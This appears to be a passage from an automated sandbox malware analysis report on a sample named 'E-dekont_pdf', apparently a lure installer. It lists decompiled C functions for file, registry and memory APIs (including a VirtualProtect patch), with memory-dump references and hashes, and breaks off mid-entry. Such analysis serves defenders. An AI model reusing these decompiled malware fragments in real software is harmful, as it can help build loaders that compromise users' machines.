                                                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                              0x0040615c
                                                                                              0x00406169
                                                                                              0x0040617e
                                                                                              0x00406184

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                              0x00406138
                                                                                              0x0040613e
                                                                                              0x00406143
                                                                                              0x0040614c
                                                                                              0x0040614c
                                                                                              0x00406155

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                              0x00405c1c
                                                                                              0x00405c24
                                                                                              0x00000000
                                                                                              0x00405c2a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 00405C1C
                                                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 33%
                                                                                              			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004065AF();
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                                              0x00402891
                                                                                              0x00402891
                                                                                              0x00402892
                                                                                              0x0040289a
                                                                                              0x0040289f
                                                                                              0x004028a0
                                                                                              0x004028af
                                                                                              0x004028b8
                                                                                              0x004028be
                                                                                              0x00402ba1
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x004028b8
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointerwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 327478801-0
                                                                                              • Opcode ID: 019347fe24728ae9ca515ac3f5c2aa3d0375c97cec2bb7346a44873e7092ed25
                                                                                              • Instruction ID: 0fc79dad603c2e18f43750183ddda5220b2c61aad5dd1925d46a8b17b14bc117
                                                                                              • Opcode Fuzzy Hash: 019347fe24728ae9ca515ac3f5c2aa3d0375c97cec2bb7346a44873e7092ed25
                                                                                              • Instruction Fuzzy Hash: CBE09272904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D1DA784D119B2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6("true");
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                                              0x004023b2
                                                                                              0x004023b2
                                                                                              0x004023b4
                                                                                              0x004023b8
                                                                                              0x004023bb
                                                                                              0x004023c0
                                                                                              0x004023c5
                                                                                              0x004023ce
                                                                                              0x004023ce
                                                                                              0x004023d3
                                                                                              0x004023dc
                                                                                              0x004023dc
                                                                                              0x004023e9
                                                                                              0x004015b4
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 390214022-0
                                                                                              • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                              • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                              • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                              • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                              0x0040650d
                                                                                              0x00406516
                                                                                              0x0040652c
                                                                                              0x00000000
                                                                                              0x0040652c
                                                                                              0x0040651a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                              • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                                              • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                              • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x0040620e
                                                                                              0x0040621e
                                                                                              0x00406226
                                                                                              0x00000000
                                                                                              0x0040622d
                                                                                              0x00000000
                                                                                              0x0040622f

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00421C0F,0041E6F0,00403579,0041E6F0,00421C0F,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F131A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6f135014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6f13501c, 4, 0x40, 0x6f135034); // executed
					 *0x6f13501c = 0xc2;
					 *0x6f135034 = 0;
					 *0x6f135030 = 0;
					 *0x6f13502c = 0;
					 *0x6f135028 = 0;
					 *0x6f135024 = 0;
					 *0x6f135020 = 0;
					 *0x6f13501e = 0;
				}
				return 1;
			}



                                                                                              0x6f131a53
                                                                                              0x6f131a58
                                                                                              0x6f131a68
                                                                                              0x6f131a70
                                                                                              0x6f131a77
                                                                                              0x6f131a7d
                                                                                              0x6f131a83
                                                                                              0x6f131a89
                                                                                              0x6f131a8f
                                                                                              0x6f131a95
                                                                                              0x6f131a9b
                                                                                              0x6f131a9b
                                                                                              0x6f131aa4

                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(6F13501C,00000004,00000040,6F135034), ref: 6F131A68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 2df6432a98dc7727a2aafb9eb504c35042101590b074bd250f6dbff680c6fefd
                                                                                              • Instruction ID: 72f498c428e27ad949b7aa01c519dde0e6df243d3b1d0160299e2d01846d93c0
                                                                                              • Opcode Fuzzy Hash: 2df6432a98dc7727a2aafb9eb504c35042101590b074bd250f6dbff680c6fefd
                                                                                              • Instruction Fuzzy Hash: 92F0C077D19B42DACB38CF1C95456053AE0B71ABE5B00452EF248DA341C33381209B9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6("true");
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x1fff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                                                              0x004023f4
                                                                                              0x004023fb
                                                                                              0x004023fe
                                                                                              0x0040240e
                                                                                              0x00402425
                                                                                              0x0040242b
                                                                                              0x00401751
                                                                                              0x004028fc
                                                                                              0x00402903
                                                                                              0x00402903
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00001FFF,00000000), ref: 00402425
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1096422788-0
                                                                                              • Opcode ID: 6c343e9bda5d013119d51b0215e161b8434a5db911e864a73de97dea4c407bac
                                                                                              • Instruction ID: 63e8f7b799cb3657af5f074fa60520448859c90a9d61b20944fb8e64719fc74d
                                                                                              • Opcode Fuzzy Hash: 6c343e9bda5d013119d51b0215e161b8434a5db911e864a73de97dea4c407bac
                                                                                              • Instruction Fuzzy Hash: 60E04F31C00229FADF10AFA0CD09EAD3668BF41340F14053AF510BB0D1E7FC89419789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004064D5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                              0x004064df
                                                                                              0x004064e6
                                                                                              0x004064f9
                                                                                              0x00000000
                                                                                              0x004064f9
                                                                                              0x004064ea
                                                                                              0x00000000

                                                                                              APIs
